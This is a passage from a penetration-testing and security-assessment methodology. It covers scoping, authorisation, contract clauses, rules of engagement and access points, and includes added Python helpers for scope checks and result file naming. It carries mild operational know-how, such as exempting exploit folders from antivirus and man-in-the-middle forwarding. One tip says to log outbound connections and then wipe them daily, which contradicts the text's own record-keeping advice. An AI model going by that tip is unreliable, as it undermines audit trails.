This section is used to describe how the project will be structured and the important
techniques that will be utilized. The project approach is intended to encourage the
project manager to think about the project from the top down instead of the traditional
bottom-up method. Including the approach in the project definition compels the project
manager to both consider the dependencies of the project and to incorporate the project
management necessary to plan and manage the project. (Remove this comment section
from final document.)
4.18 PROJECT ORGANIZATION (ASSESSMENT TEAM & CLIENT)
It is important to understand who the major players are on the project. An organization
chart works well. Otherwise, list the major project roles and the actual people involved.
(Remove this comment section from final document.)
Add a project organization chart, if available. (Remove this comment section from final
document.)
Comments:
4.19 RESPONSIBILITY MATRIX
A – Approves the Deliverable
R – Responsible for Creating the Deliverable
N – Notified when the Deliverable is complete
M – Manages the Deliverable
F – Facilitates timely Resource Allocation
S – Responsible for Acceptance and Sign-off
P – Participates in Archiving the Deliverable
Columns: S.NO | Deliverables & Tasks | Assessment Team: Program Manager | Project
Manager | Consultant Team Members | Clients: Stakeholders | Project Manager |
Functional Heads
Sample row: 1 | Project Scope | A | R | R | R | |
4.20 SIGN-OFF SHEET
Client Name: XXXXX
Project Manager: XXXX
Project Name: IT Security Assessment
Purchase Order Number:
Begin Date: 04/06/03
Target End Date: 10/09/03
Final End Date:
S.NO | Deliverables | Assessment Team Name | Date Completed
1 | Statement of Work | Xxxxxxxxxxxx | 13/06/2003
Final Sign off
The assessment team has successfully performed according to the conditions set forth
in the SOW dated _____ for the Security Assessment Project.
Sign Off on Work Performed:
_________________
XXXXXXX
Assessment Lead
_____________________
XXXXX
Client Lead
5 BEST PRACTICES– PRE ASSESSMENT, ASSESSMENT
AND POST ASSESSMENT
Over the last few years, the security assessment process has evolved from an assorted
set of attacks carried out by amateurs into a mature and reviewable assessment process
with strong legal boundaries and well-defined deliverables.
Irrespective of whether the engagement is a Vulnerability Assessment, Penetration
Testing and/or Security Assessment, there are certain things the assessor needs to take
care of while assessing the strength of an enterprise’s security.
A well-defined, proven and structured assessment can assist greatly in fortifying your
defenses; it also throws up newer, more complex issues that you will have to deal with,
e.g. legal aspects. Check the Knowledge Base section for more detail on this.
This section provides the best practices / guidelines required to perform the security
assessment. Management, the key people involved in the assessment and all other
members of the assessment team must read and follow them. The owner and the
assessment company (whether internal or external) should sign them before starting an
assessment.
Best Practices / Guidelines (record Compliance: Yes/No, and Comments, against each
item)
Legal Aspects
• Ensure that you have signed a Non-Disclosure Agreement with the company that is
performing the assessment. Recommended reading: Non-Disclosure Agreement in the
Knowledge Base section.
• Ensure that you have signed the Security Assessment Agreement. Recommended
reading: Security Assessment Agreement in the Appendix.
• Ensure that you do not scan outside IP addresses and are limited to the IP addresses
and domains specifically assigned to you. Check every target against the signed scope
before the first packet is sent; a host name that resolves to an address outside the
assigned ranges is out of scope even if the name looks right.
• Clearly define the boundaries of the assessment to avoid any conflict and/or
confidentiality issues. E.g. an assessor who breaks into a system may be able to read
confidential information on it: make it clear whether you want the assessor to access
confidential information and show it to you, or just leave a marker text file on the
system as proof of access.
• Clearly define the limits of liability for the assessment team in case of an incident
caused by negligence or malpractice. E.g. most assessment teams limit their liability to
the cost of the security service being performed.
People
For the assessment team participating in the assessment, the following information must
be documented and evaluated by the Assessed Company:
a) Experience with the platforms, applications, network protocols and hardware devices
being tested. The experience of the candidates should match the targeted infrastructure.
b) Certifications and courses related to penetration testing. This information should
confirm that assessment team members are capable of performing the activities
described in the scope of the service.
c) Years of experience in penetration testing engagements. This information should
confirm that assessment team members are capable of performing the activities
described in the scope of the service.
d) Attack scripting/programming languages mastered by each member. This information
should demonstrate the ability to design and perform manual testing procedures.
e) Public information showing each member’s participation in the community, such as
articles, forum posts, papers, participation in events, etc. People who show up in public
places demonstrate their credentials and are more easily trusted. Assessors who have
engaged in public discussions on information security testing demonstrate their
knowledge and experience.
f) List and description of tools/scripts related to security assessment created/modified by
each member. This information should demonstrate the ability to design and perform
manual testing procedures.
g) Roles and responsibilities of each member in the team. This information should
indicate the degree of involvement of each assessor and the importance of their
participation in the team.
• Have you gone through the resumes (including references) of the assessment team
members, and are you satisfied with their skills?
• Have you checked the recruiting policies of the company, and are you comfortable with
them?
• Have the employees of the company performing the assessment signed strong
non-disclosure agreements with their firm?
Processes
• Have you clearly stated whether you want a denial of service attack to be attempted
against your live or test system, or whether you prefer that the assessors simply audit
the system and describe the specific flaws in your network that leave you susceptible to
a particular denial of service attack?
• Generally a security assessment / penetration test is recommended only when you
have baseline security in place.
• Are you assessing the security of secondary systems (possibly redundant ones) instead
of primary systems? Both approaches have their advantages and disadvantages, but it
is generally recommended that you assess the security of secondary servers rather than
primary servers when strict confidentiality has to be maintained and no downtime is
acceptable. The path used to attack the secondary servers can reveal flaws in your
security architecture that apply equally to your primary servers, provided the secondary
servers are built and patched to the same configuration; findings from a system that
differs from production do not transfer.
• Is the test infrastructure secure and is logging performed? Please give details.
• Is the assessment team or a team member going to perform any test from home,
especially using a PC other than an official laptop or assessment machine?
• Ensure that the assessment team provides precise information on the physical and
logical locations of the assessment equipment (e.g. the physical addresses from where
tests will be conducted and the IP addresses used at the time of the test).
• Is a process established to get clearance before starting a test?
• Are the test cases provided to you?
• Ensure that the organization/company has licenses for the commercial tools used by
the assessment team. Make sure that both parties are clear on who is going to provide
which tools.
• Are the date, time and day of the assessment fixed? A time when traffic is minimal is
preferred; late nights and weekends are good times, since any unexpected negative
impact on the network will cause the least harm to users during off-peak hours.
• Does the Assessment Company have well-defined processes for managing the output
of the test cases?
• Ensure that the Assessment Company and the Assessed Company exchange contact
information for the people involved in the tests, reachable at any time during the
engagement (e.g. email addresses, phone numbers, fax numbers and pagers).
Deliverables
• The assessment team should show a clear approach and path of attack to be carried
out, and give a demo as and when required. A list of vulnerabilities on the compromised
network is not sufficient, since it may not show the actual path that can be exploited.
• Has the Assessment Company submitted a sample copy of previous assessment
reports? Does it cover everything you want as a client? When supplying such a sample,
ensure that you do not reveal any kind of client information: very clearly mask the client
name and any information that makes resources identifiable, such as IP addresses.
• The report shall contain all tests performed and their outputs as per the ISSAF test case
template.
• The report shall list the vulnerabilities identified and the countermeasures to safeguard
against them.
• Very high / critical threats must be reported immediately, not held back for the final
report.
• Ensure that you do not use a new/unfamiliar tool on a production environment.
• Guard against performing a man-in-the-middle attack and forgetting to forward traffic
further; on a Linux relay this means confirming that IP forwarding (net.ipv4.ip_forward)
is enabled before redirecting any traffic, otherwise the victims’ traffic is silently dropped
and the outage is noticed before the test is.
• Guard against performing a man-in-the-middle attack without considering the speed of
the device that is performing it. Generally middle-man devices are slow and cannot give
high throughput; a laptop, for example.
Readiness of Infrastructure
• The assessor should make sure the connection for testing is up and that a backup line
or internet access is readily available before starting the tests.
• Ensure that certain protocols/services are not, for whatever reason, blocked at the
assessment center end (your company/ISP). That may seriously affect your assessment
results. E.g. ICMP is blocked as per corporate policy; e.g. UDP traffic is blocked at the
ISP end because of a worm. Strange, but it happens sometimes. Verify this against a
host you control outside the assessment center before the test window opens, so that a
missing response is not misread as a filtered target.
• Ensure that your company’s technical infrastructure department does not change the IP
addresses of the Assessment Center without your permission; this could negatively
impact your tests because the target firm will be expecting connections from a certain IP
range, and traffic from any other address is indistinguishable from a real attack.
• Ensure readiness of the assessment team kit:
o Assessment tools / products
o Operating system CDs
• Ensure that the people involved in the assessment process properly understand the
client’s requirement as specified in the RFP.
• Ensure that you are using dedicated equipment for testing. Email and any other
administrative or personal activities should be performed on other machine(s), or, if on
the same machine, on a different boot partition. This guarantees the integrity of the
testing machine.
• Ensure that a process is available for collecting test results and that they are presented
in a proper format; otherwise analysis will take a lot of time and important information
may be missed.
• Ensure that the testing process is closely monitored and documented, in order to
facilitate the identification of telecommunications problems and false positives (usually
the test is recorded at network level using a protocol analyzer on a different machine, to
avoid impacting the performance of the testing equipment).
• Avoid a breach of confidentiality by releasing customer data.
• Ensure that your storage server for test results is secure.
• Ensure that all correspondence is handled in an appropriate way. If you exchange asset
information verbally, on plain paper or by phone (which generally happens while
performing onsite assessments), you have no record afterwards to prove that this is
what the client gave you for assessment, should any undesirable politics arise. This
guideline can be adopted at various stages of the assessment process. Use of digital
signatures and encryption for formal electronic communication is necessary to
guarantee confidentiality, authenticity and non-repudiation.
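The legal-aspects item (stay within the IP addresses and domains assigned to you), the processes items (declare your source addresses to the client, fix the date and time of the test) and the readiness items (the assessment center's addresses must not change under you) are all conditions that can be checked mechanically before the first packet is sent. The script below is an added example and is not part of the ISSAF or of any tool it references: the scope values, the client name, the test window and the function names are the editor's own constructions (the addresses are RFC 5737 documentation ranges), and it stands in for whatever was copied out of the signed Security Assessment Agreement.

```python
"""Pre-flight gate for a security assessment: refuse to start if the planned test
would step outside the signed scope. Added example; the scope below is constructed."""
import hashlib
import ipaddress
from datetime import datetime, time

# Constructed sample of what is copied out of the signed Security Assessment
# Agreement. Addresses are RFC 5737 documentation ranges; the client is fictional.
SCOPE = {
    "client": "Example Corp",
    "networks": [ipaddress.ip_network("203.0.113.0/24"),
                 ipaddress.ip_network("198.51.100.16/28")],
    "domains": ["example.com"],
    # Source addresses that were communicated to the client (and opened on their
    # firewall); anything else is indistinguishable from a real attack.
    "source_ips": ["192.0.2.10", "192.0.2.11"],
    # Agreed off-peak window: Saturday 22:00 to Sunday 06:00 (weekday 5 = Saturday).
    "window": {"days": {5}, "start": time(22, 0), "end": time(6, 0)},
}


def at(when: str) -> datetime:
    """Parse the planned start time, e.g. '2024-06-08 23:00'."""
    return datetime.strptime(when, "%Y-%m-%d %H:%M")


def _in_networks(ip: str, networks) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in networks)


def target_in_scope(target: str, scope: dict, resolved_ips=()) -> bool:
    """A target is in scope if it is an address inside an assigned network, or a
    host name under an assigned domain. For names, every address the name
    resolves to must also lie inside the assigned networks: a name that points
    at a shared host or a third party's range is out of scope however it looks.
    Resolution is left to the caller so this check works offline."""
    try:
        ipaddress.ip_address(target)
    except ValueError:
        pass  # not an address; treat it as a host name below
    else:
        return _in_networks(target, scope["networks"])
    name = target.lower().rstrip(".")
    # Suffix match on a label boundary: 'www.example.com' yes,
    # 'example.com.evil.net' and 'notexample.com' no.
    if not any(name == d or name.endswith("." + d) for d in scope["domains"]):
        return False
    return all(_in_networks(ip, scope["networks"]) for ip in resolved_ips)


def within_test_window(now: datetime, window: dict) -> bool:
    """True if 'now' falls in the agreed window. A window that crosses midnight
    (start > end) is handled: its early-morning part belongs to the day on
    which it started, so Sunday 03:00 is inside a Saturday 22:00-06:00 slot."""
    start, end, days = window["start"], window["end"], window["days"]
    t = now.time()
    if start <= end:
        return now.weekday() in days and start <= t < end
    if t >= start:
        return now.weekday() in days
    if t < end:
        return (now.weekday() - 1) % 7 in days
    return False


def scope_fingerprint(scope_text: str) -> str:
    """SHA-256 of the scope document as received, to be written into the test log
    so the record can be tied to exactly the document both parties signed."""
    return hashlib.sha256(scope_text.encode("utf-8")).hexdigest()


def preflight(targets, source_ip: str, when: str, scope: dict, resolved=None) -> list:
    """Return the list of reasons the test must not start; empty means go.
    'resolved' maps host-name targets to the addresses they resolved to."""
    resolved = resolved or {}
    problems = []
    for target in targets:
        if not target_in_scope(target, scope, resolved.get(target, ())):
            problems.append(f"target out of scope: {target}")
    if not any(ipaddress.ip_address(source_ip) == ipaddress.ip_address(s)
               for s in scope["source_ips"]):
        problems.append(f"source address {source_ip} was not declared to the client")
    now = at(when)
    if not within_test_window(now, scope["window"]):
        problems.append(f"{now:%a %H:%M} is outside the agreed test window")
    return problems


if __name__ == "__main__":
    plan = ["203.0.113.7", "www.example.com", "10.0.0.1"]
    resolved = {"www.example.com": ["203.0.113.20"]}
    for reason in preflight(plan, "192.0.2.10", "2024-06-08 23:00", SCOPE, resolved):
        print("STOP:", reason)
```

Run it from the assessment machine with the real target list, the address the tests will actually leave from, and the planned start time; an empty result is the go condition, and the fingerprint of the scope document goes into the same log entry as the start of the test so the record matches what was signed.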
5.1 PRE-ASSESSMENT PHASE
5.1.1 Request for Proposal (RFP)
The organization shall clearly define the following:
• Name and details of person to whom proposal needs to be submitted
•
Maximum time to submit the proposal (E.g. 1st Jan 2005)
•
Maximum time to complete the assessment (e.g. March 2005)
•
High level design of network architecture to selected companies after signing NonDisclosure Agreement(NDA)
The organization shall clearly ask the Assessment Company to state the following in the
proposal:
• Maximum time to complete the assessment (e.g. March 2005)
•
Expected time to complete each task
•
Serial and parallel tasks in proposal
•
Dependencies between tasks
•
Time period in which the assessment has to be completed
• The Assessment Company’s understanding of the organization’s requirement:
o
Asset segments which needs to be assessed
o
Number of Access Points and devices from where assessment has to be
performed
o
Expected deliverables
o
Clearly defined scope of assessment, including the expected depth of tests in each
task (how far should the assessors go: network, OS, application level, etc.)
o
List of objectives by which each task will be evaluated (should be effort
oriented, not success/failure oriented)
5.1.2 Evaluation of Third Party Contracts
5.1.2.1 PURPOSE OF THIRD PARTY CONTRACTS EVALUATION
In today’s highly connected world, organizations typically share business information
with a number of third parties, either out of a business imperative or to comply with
regulatory requirements. The sharing could be as simple as an exchange of emails or
as ‘invasive’ as providing remote access to each other’s internal systems.
An organization would typically have no control over the security management at a third
party and therefore have no control over the security of their own information. The best
an organization can do in most cases is to cover themselves legally with the appropriate
clauses in contracts with third parties.
5.1.2.2 AIM / OBJECTIVE OF THIRD PARTY CONTRACTS EVALUATION
As part of an evaluation of information systems security, contracts with third parties must
be evaluated to see if the organization is adequately covered legally.
This is also a recommendation within ISO 17799.
5.1.2.3 THIRD PARTY CONTRACT EVALUATION GUIDELINES
The roles of third-parties can be varied:
Application support and maintenance for an organization’s internal systems; Business
partner (e.g. distributor) with access to internal systems; Facilities managed service, i.e.
they host and manage the organization’s "internal" system; Business partner providing
services to the organization’s customers on behalf of the organization.
Contracts with third parties should have clauses similar to those mentioned in this
section. Not all clauses will be suitable in all cases, and additional clauses will be
required for the specific services provided.
Existing contracts typically provide good coverage of some of the items listed in ISO
17799, such as service level agreements and intellectual property rights. This section
highlights those items that existing contracts do not typically cover.
[start of contract clauses]
Security of <Company’s> and <Company’s> Customers’ Information Assets
By 'information assets' is meant, without limitation, paper documents, electronic data, servers, desktop computers, laptops, PDAs, software, network elements and mobile telephones.
The Supplier may be given access to <Company’s> and <Company’s> customers’
information assets to allow them to fulfill their obligations under this contract.
1) The Supplier shall take all reasonable steps to protect the confidentiality, availability
and integrity of <Company’s> and <Company’s> customers’ information assets,
including but not limited to:
a) Implementing appropriate security policies and practices, consistent with the most
current version of AS/ISO 17799.
b) Complying with the <Company> Acceptable Use Policy, the current version of which
is attached in Appendix XXX. The most up-to-date version of this policy is available on
the <Company> web site.
c) Complying with all applicable privacy and cybercrime legislation.
d) <Optional> Complying with all applicable financial/health/other industry standards.
e) <Optional> Compliance with the security policies and standards attached in Appendix
XXX.
2) Upon written request, the Supplier shall provide to <Company> a copy of their
information security policy, standards, operating procedures and related documentation.
<Optional> The Supplier authorises <Company> to forward this documentation to any
<Company> customer who is supported by the Supplier.
3) Where <Company> has responsibility for maintenance of user accounts: The Supplier shall notify <Company> within 1 working day, if an employee, contractor or agent of the Supplier, who has access to <Company’s> or <Company’s> customers’ information assets:
a) Leaves the employment or hire of the Supplier. If the termination happens under unfriendly circumstances, the Supplier shall notify <Company> within 1 hour.
b) No longer requires access to <Company’s> or <Company’s> customers’ information assets.
4) Where the Supplier has responsibility for maintenance of user accounts: The Supplier
shall change all relevant passwords within 1 working day, if an employee, contractor or
agent of the Supplier, who has access to <Company’s> or <Company’s> customers’
information assets:
a) Leaves the employment or hire of the Supplier. If the termination happens under
unfriendly circumstances, the Supplier shall change passwords within 1 hour.
b) No longer requires access to <Company’s> or <Company’s> customers’ information
assets.
5) Security Incidents.
A breach of security includes, but is not limited to, a loss or theft of information assets.
a) The Supplier shall notify <Company> immediately upon a confirmed, or suspected,
breach of security of <Company’s> or <Company’s> customers’ information assets. The
notification shall be to ALL of the following:
i) by telephone – <Insert the <Company> contact the Supplier uses for issue
escalation>
ii) by email - infosec@<company>.com.au
b) The Supplier shall provide all required assistance to <Company> in investigating a
breach of security.
OR
5) The Supplier shall adhere to the Information Security Incident Response Plan agreed
with <Company> and attached in Appendix XXX.
6) The Supplier shall ensure that all the Supplier’s information assets with access to
<Company’s> or <Company’s> customers’ information assets:
a) are free of viruses and other malicious software;
b) have an anti-virus tool installed, enabled and configured to use the latest signature
files provided by the anti-virus vendor.
7) The Supplier shall ensure that all employees, contractors or agents who require
access to <Company’s> or <Company’s> customers’ information assets sign a Non
Disclosure Agreement prior to being given access.
8) The Supplier shall ensure that all employees with access to <Company’s> or
<Company’s> customers’ information assets are provided training on the relevant
security policies and procedures prior to being given access and are provided refresher
training every year subsequently.
9) Upon written request, the Supplier shall allow <Company> to audit the Supplier's
facilities, networks, computer systems and procedures for compliance with the Supplier's
and other agreed Information Security policies and standards. <Company> may utilise a
third party to conduct the audit. Audits may include, but not be limited to, the use of
automated tools and penetration tests. <Company> shall request audits as and when
necessary, but no more than four times in any 12 month period. A minimum of 48 hours
notice shall be given prior to an audit.
10) <Optional> If the above clauses are breached:
a) <Company> reserves the right to terminate this contract, etc.
b) The Supplier shall be liable to pay penalties to <Company>, etc.
[end of contract clauses]
The following must be attached to the contract as required:
• <Company’s> Acceptable Use Policy;
• Security policy and standards documents;
• An Incident Response Plan.
5.1.3 Sales and Marketing
Some of the guidelines during the sales life cycle are as follows:
o Consider the size, politics and type of industry of the organization.
o Take into account the skills and knowledge of the organization’s personnel.
o Consider the organization's mission, goals and objectives for this project.
o Consider the risks and complexity of the service required.
o The sales person should understand the need for right pricing, based on the two considerations above.
o The sales person should understand the complete assessment cycle.
5.1.4 Obtain Authorization and Make Sure the Right People Have Given It
Security assessment involves performing actions very similar, if not identical, to those carried out by an attacker. Likewise, the security test may result in the compromise of information systems, as a result of which classified information may be accessed during the test. Even where an agreement exists between the security assessor and the client, the latter may not accept, for instance, that classified information may be revealed to the security assessor.
For these reasons it is always necessary to obtain clear authorization from the customer to perform the security assessment. Typically, approval from the customer should be sought in such a manner that the customer assumes responsibility for the results and side-effects (if any) of the security assessment.
It is also very important that the right person has given you permission. Obtain it from the appropriate management / authority. It is recommended that the IT department of every company should have a process for such approvals.
Such approvals should be printed on company paper (letterhead) and signed by the
responsible person(s).
Reference: Security assessment agreement in appendix
5.1.5 Define the scope of work
As part of the contract or agreement between the security assessor and the client, the scope of the work to be done must be clearly specified. Whenever possible, loose or ambiguous definitions should be avoided. The security assessment work will be performed with better accuracy and its results will be more reliable when the extent of the work is bounded.
Scope of Work
• Define evaluation criteria: evaluation criteria use metrics based on effort, e.g. N different automated tests + M different manual tests are to be performed, independently of whether those tests result in compromising the target or in vulnerability findings or not. All the results of the tests will be submitted to the client.
• Define objectives
• Define scope areas
• Define “out of scope” areas
Both parties should define and agree on the scope of work. The scope of work should clearly define what should be done and what not, and define timelines and dependencies of the work for both parties. Areas which the scope of work should cover include:
• Complete organization
• Specific location(s)
• Specific branch(es)
• Specific division(s)/sub-division(s)
• Nature of testing (intrusive / non-intrusive)
• Testing from external, internal, or both
• In context with web presence(s)
  o Domain names (DNS)
  o Server names (internal)
  o IP addressing
• In context with infrastructure
  o Remote access like dial-up, VPN, Frame Relay etc.
  o ATM
5.1.6 Define the “Out of Scope” Areas
After going through the scope of work definitions, there must be clearly defined limitations and conditions for the assessors, which they must not violate.
Some customers prefer to have testing done in off hours (nighttime) and on weekends, as it reduces the impact of any downtime. Off-hours testing is only good when it is done in the presence of client staff, to ensure that if any downtime happens the staff can control it and take the necessary actions.
5.1.7 Sign Agreement
On the basis of the above mentioned points, sign a formal agreement. This written permission, often called the rules of engagement, should include two agreements: 1. Security Assessment Agreement and 2. Non Disclosure Agreement.
5.1.7.1 ASSESSMENT AGREEMENT
An assessment agreement should include:
• Scope of work
• Out of scope work
• IP addresses or ranges that need to be assessed
• Any specific IP addresses / subnets, hosts or domains that should be restricted
• Liability for any downtime
• Time of completion of the project and indication of any delay
• The contract price, any additional charges and applicable penalties
• Payment (advance and after the project)
• Date- and time-wise schedule of assessment based on a time and material or fixed bid contract
• Some mechanism for the case that testing takes more than the estimated time
• Source IP addresses of the machines from which the security assessment and tests will be conducted
• A mechanism for dealing with false positives in order to avoid unnecessary law enforcement involvement
• Contact person(s) at the client and at your company (both phone and mobile phone numbers as well as email addresses)
• General provisions
  o For delay/non-payment
  o For additional labor
Reference: Security assessment agreement in appendix
5.1.7.2 NON DISCLOSURE AGREEMENT
A Non Disclosure Agreement should include the following:
• Purpose
• Definition
• Non-Disclosure of Confidential Information
• Mandatory Disclosure
• Return of Materials
• No License Granted
• Term
• Miscellaneous
• Governing Law and Jurisdiction
• Remedies
Reference: Non Disclosure agreement in appendix
5.1.8 Team Composition
Consider efficiency and accountability and compose a team of domain experts, as per the scope of work. A security assessment can be achieved much better with specialized team members than by having one person do everything. Different team members bring different sets of skills together. Some team members may have the skills to break into systems but may not know firewall/IDS security assessment. Quite often it is seen that people who are good at breaking into systems are not so good at putting test results into an appropriate format for the report, and also do not like taking notes of their work.
5.1.9 Commercials
Based on the type of engagement, scope, skill set requirements and complexity of the system, the commercials can be worked out. The type of calculation may vary between a time and material and a fixed bid model.
5.1.10 Maintain confidentiality of customer data - before start of Project
In preparation for the security assessment job, the assessor may require information
from the client in order to carry out the tests, such as network infrastructure diagrams, IP
addresses, location of customer premises, contact information for people in the
organization, existence and location of network access points, vendor of network and IT
systems, among other types of information.
This information may be confidential, and it is the security assessor's duty to ensure that
any such information handled throughout the project will be treated according to its
classification within the customer organization.
5.1.11 Access Point Identification
It is of paramount importance that the access points chosen for conducting a security assessment represent all the possible threats, threat agents and possible business risks. The choice of access points, along with a good cross-section sample of devices, is imperative for correct determination of the threat to the facility and information systems.
Based on the given low-level network architecture design, and with the help of the customer's technical representatives, choose the access points to represent the various threat agents such as “internet”, “operators/customers”, internal, etc. Along with the threat agents, test the network layer by layer as per the methodology. The generalized division of the network into layers is given in the layered architecture design below; the segments/components in it are tested from the viewpoint of threat agents such as “the internet”, “administrator” and “customer”.
Here we take a very common network architecture design and, based on that, identify access points for testing.
5.1.11.1 LAYERED NETWORK ARCHITECTURE DESIGN
[Figure: layered network architecture design showing the Switch Blocks, Management Block, Server Block, WAN Block and Internet Block, each monitored by IDS]
5.1.11.1.1 ACCESS LAYER
[Figure: access layer, spanning the Switch Blocks, Management Block, Server Block, WAN Block and Internet Block]
Key Elements to Assess / Access Points:
• Layer-2 Switch [Switch Block1]
• Layer-2 Switch [Switch Block2]
5.1.11.1.2 DISTRIBUTION LAYER
[Figure: distribution layer, spanning the Switch Blocks, Management Block, Server Block, WAN Block and Internet Block]
Key Elements to Assess / Access Points:
• Layer-2 Switch [Block1]
• Layer-2 Switch [Block2]
5.1.11.1.3 CORE LAYER
[Figure: core layer, spanning the Switch Blocks, Management Block, Server Block, WAN Block and Internet Block]
Key Elements to Assess / Access Points:
• Layer-2 Switch [Core]
• Layer-2 Switch [Core]
5.1.11.1.4 HIGH AVAILABILITY AND LOAD BALANCING
Key Elements to Assess / Access Points:
• Layer-2 Switch [Block1]
• Layer-2 Switch [Block2]
5.1.11.1.5 MANAGEMENT BLOCK
[Figure: management block with NIDS and HIDS]
Key Elements to Assess / Access Points:
• Firewalls
• Network based Intrusion Detection Systems
• Host based Intrusion Detection Systems
• Syslog server
• SNMP Management System
• System Admin Hosts
5.1.11.1.6 SERVER BLOCK
[Figure: server block with NIDS]
Key Elements to Assess / Access Points:
• Firewalls
• Network Intrusion Detection System
• Host Intrusion Detection System
• NTP Server
• TACACS+ Server
• SecurID Server
• Certificate Server
• Corporate Servers
• Call Manager
• DNS Servers
• E-Mail Servers
5.1.11.1.7 WAN BLOCK
[Figure: WAN block with crypto clusters]
Key Elements to Assess / Access Points:
• Firewalls
• NIDS
• Crypto Clusters
• Routers
5.1.11.1.8 INTERNET BLOCK
[Figure: internet block with HIDS, NIDS and VPN concentrator]
Key Elements to Assess / Access Points:
• Firewalls
• Host Based Intrusion Detection System
• Network Based Intrusion Detection System
• VPN Concentrator
• HTTP Server
• DNS Servers
5.2 ASSESSMENT PHASE
5.2.1 Rules of Engagement
Establish clear rules of engagement based on the assessment scope. Cover the same in the scope of work agreement mutually agreed and signed by the client and the assessment team.
During the course of the project the customer may provide the assessor with further information, as required by the progress of the security assessment job (network diagrams, system parameters, applications used, access credentials, etc.). The assessor must be aware of the confidentiality of the information used to do the job, and treat it as such.
Security tests may also yield information about the customer's information systems that,
while not provided directly to the assessor, may also be confidential. This includes any
vulnerability that may be found as a result of the security assessment.
Likewise, any documents, company information, personal e-mail or any other types of
computer files that the assessor may have access to as a result of a successful
penetration test, shall also be treated with confidentiality.
• Never violate the security policy.
• Never operate beyond the agreement.
• Never operate beyond the scope of work unless officially requested by the client (this should be done through a signed request and approval).
• Members of the analysis team may be present during the assessment.
• Ensure all the required approval(s) from all concerned department(s) have been taken (just in case they are required even after management approval).
• Ensure all the affected departments/personnel have been informed. Inform them of the time of assessment and also of any chances of downtime.
• Vulnerability scan
  o Ensure the latest signatures are updated.
  o Ensure the latest signatures are tested in a lab environment before using them in the production environment.
  o Ensure the automated vulnerability scanner (the current version which you are trying to use) is not creating any kind of problem during the scan (especially any kind of denial of service against the target). To achieve this you can subscribe to product and industry mailing lists and/or ask a question there, and/or test the product at least once before using it in the production environment.
  o Use at least two automated vulnerability scanners (to prioritize manual verification of common vulnerabilities before fiddling with false positives).
• Vulnerability assessment tool – A vulnerability assessment tool may be software (an automated scanner which works based on a vulnerability database), a script, a customized script and/or a check-list.
  o It should check for known/unknown weaknesses and mis-configurations.
    - For known vulnerabilities, Common Vulnerabilities and Exposures (CVE) is a publicly available, commonly used vulnerability database. This database is maintained by the MITRE Corporation and is accessible at http://www.cve.mitre.org. This vulnerability database is not fully sufficient on its own; one needs to maintain a custom vulnerability database as well.
    - http://www.securityfocus.com/bid is also a good place to search for vulnerabilities (and for exploits and possible solutions).
• Perform manual verification of all vulnerabilities identified with the automated tools and vulnerability assessment tools.
• Inform the analysis team immediately about any identified high-risk vulnerabilities and countermeasures to safeguard against them.
• Ensure assessor’s machine security
  o Implement the latest patches for the operating system and applications installed on it.
  o Administer the assessor machine with security in mind.
  o Implement a host based firewall and intrusion detection and prevention system on it.
• Provide proof of assessor machine security – Many times penetration testers / assessors don’t apply the security patches on their machines, in order to test some exploits before firing them at the target organization and/or for demonstration purposes. There is a chance that these machines may be compromised by an attacker/worm and used as a staging host to perform further attacks on the target organization.
  o Before the start of the test, perform a vulnerability scan with an automated vulnerability scanner on the assessor machine and send it to the project manager and/or client every day.
  o Run an audit script and send the output to the client.
  o If needed, sign a “secure system” document of the client (this can be a requirement to get access to the network).
  o Make sure the anti-virus is not deleting/quarantining/clearing exploits/tools. Sometimes it just removes some part of the code, and as a result the tool doesn’t work. Keeping your tools/exploits repository on a separate drive and setting the anti-virus not to scan that specific drive can be a good solution.
• Record everything during the course of testing. A simple manual logging sheet can be used for this purpose.
  Record every testing activity. It will safeguard you against any consequences. Consider the fact: what if a production server comes down during the course of testing? Your recording and log of activities will make the incident very clear from your perspective; otherwise any problem may be directed at you. One of the simplest ways to do this is to log all outbound connections in your host based firewall and wipe them every day.
• Send a weekly status report to the client and/or organize one follow-up meeting.
• Maintain sufficient records
  o They will support your findings and recommendations.
  o They will protect against unnecessary politics in which you may be accused of unprofessional, unethical or unauthorized practices.
  o They will act as a log repository to ensure recommendations are being addressed.
• Gather test information in a structured order
  o Make folders as per domain name or task name.
  o Give appropriate file names to test result files, e.g. IP-Address_Tool-Name_Option_Date-Time_other: 111.222.111.222_Nmap_SYN-SCAN_020903-1530
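As an added example that is not part of ISSAF, the following Python builds, validates and parses result file names following the IP-Address_Tool-Name_Option_Date-Time_other scheme above and files them into a per-domain or per-task folder. The DDMMYY-HHMM reading of the Date-Time token and the function names are assumptions, since the page does not define them.

```python
import ipaddress
import re
from datetime import datetime
from pathlib import PurePosixPath
from typing import Optional

# Underscore separates the fields of the scheme, so a field may not contain one.
_FIELD_RE = re.compile(r"^[A-Za-z0-9.-]+$")
# Assumed layout of the Date-Time token: DDMMYY-HHMM (e.g. 020903-1530).
_STAMP_FMT = "%d%m%y-%H%M"
_STAMP_RE = re.compile(r"^\d{6}-\d{4}$")


def _clean_field(value: str) -> str:
    """Turn spaces and underscores into hyphens so the field cannot break the scheme."""
    cleaned = re.sub(r"[\s_]+", "-", value.strip())
    if not _FIELD_RE.match(cleaned):
        raise ValueError(f"field has characters outside the scheme: {value!r}")
    return cleaned


def result_filename(ip: str, tool: str, option: str, when: datetime,
                    other: Optional[str] = None) -> str:
    """Build IP_Tool_Option_DateTime[_other] for one test result (no extension)."""
    ipaddress.ip_address(ip)  # raises ValueError for a malformed address
    parts = [ip, _clean_field(tool), _clean_field(option), when.strftime(_STAMP_FMT)]
    if other:
        parts.append(_clean_field(other))
    return "_".join(parts)


def parse_result_filename(name: str) -> dict:
    """Split a name built by the scheme back into its fields; ValueError if malformed."""
    parts = name.split("_")
    if len(parts) < 4:
        raise ValueError(f"not in IP_Tool_Option_DateTime[_other] form: {name!r}")
    ip, tool, option, stamp = parts[:4]
    ipaddress.ip_address(ip)
    if not _STAMP_RE.match(stamp):
        raise ValueError(f"date-time token is not DDMMYY-HHMM: {stamp!r}")
    return {
        "ip": ip,
        "tool": tool,
        "option": option,
        "timestamp": datetime.strptime(stamp, _STAMP_FMT),
        "other": "_".join(parts[4:]) or None,  # anything after the stamp is 'other'
    }


def is_valid_result_filename(name: str) -> bool:
    """True when the name follows the scheme, so stray files are caught at filing time."""
    try:
        parse_result_filename(name)
    except ValueError:
        return False
    return True


def result_path(base: str, domain_or_task: str, filename: str) -> str:
    """One folder per domain name or task name, as the checklist recommends."""
    if not is_valid_result_filename(filename):
        raise ValueError(f"refusing to file a result with a non-conforming name: {filename!r}")
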